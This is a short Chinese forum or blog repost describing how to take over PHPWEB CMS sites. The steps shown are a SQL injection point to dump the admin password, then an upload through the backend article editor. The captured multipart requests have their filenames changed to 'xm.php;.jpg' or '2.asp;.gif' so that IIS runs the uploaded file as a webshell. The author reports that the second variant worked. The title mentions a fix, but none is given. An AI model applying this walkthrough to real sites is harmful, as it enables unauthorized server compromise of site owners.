好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

PHPWEB后台拿SHELL编辑器抓包NC漏洞及修复 - 网站安

 

 

刚看完电视闲着睡不着,随便找了个CMS在这玩,PHPWEB这么差劲啊,后台编辑器既然存在这种初级 漏洞 ,刚看到一个别人说抓包后照样改的:

 

 

只适用于IIS的....apache没得玩....

 

先用注射点跑出密码

down/class/index.php?myord=1

 

之后后台地址是admin.php

 

登陆进去,找个发布文章的地方,找到一个发布文章的地方,比如

down/admin/down_conadd.php

 

点下面详细介绍里面的图片按钮`之后选择一个文件上传

这个时候抓包或者用本地代理的工具

-----------------------------7db229330de4

HdhCmsTest2cto测试数据 Content-Disposition: form-data; name="fileName"

 

201108181313610483553.jpg

-----------------------------7db229330de4

Content-Disposition: form-data; name="attachPath"

 

down/pics/

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileData"; filename="xm.jpg"

Content-Type: text/plain

 

 

得到上面的报文...

自己构造下,把filename="xm.jpg"改成filename="xm.php;.jpg"

之后发包就OK了...

 

 

 

 

这个我试了,不管用。

 

后来试着去尝试改生成之后的文件名截断,类似下边这样

 

 

 

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileName"

 

 

 

201109241316808273671. asp ;.gif

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="attachPath"

 

 

 

news/pics/

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileData"; filename="2.asp;.gif"

 

Content-Type: text/plain

 

 

 

gb2312

 

<%

 

on error resume next

 

%>

 

 

 

这回管用了。

 

 

 

我在想个问题是不是类似这样的编辑器都存在NC提交问题呢?我一会试试其他的。

 from:zgg的空间

查看更多关于PHPWEB后台拿SHELL编辑器抓包NC漏洞及修复 - 网站安的详细内容...

  阅读:66次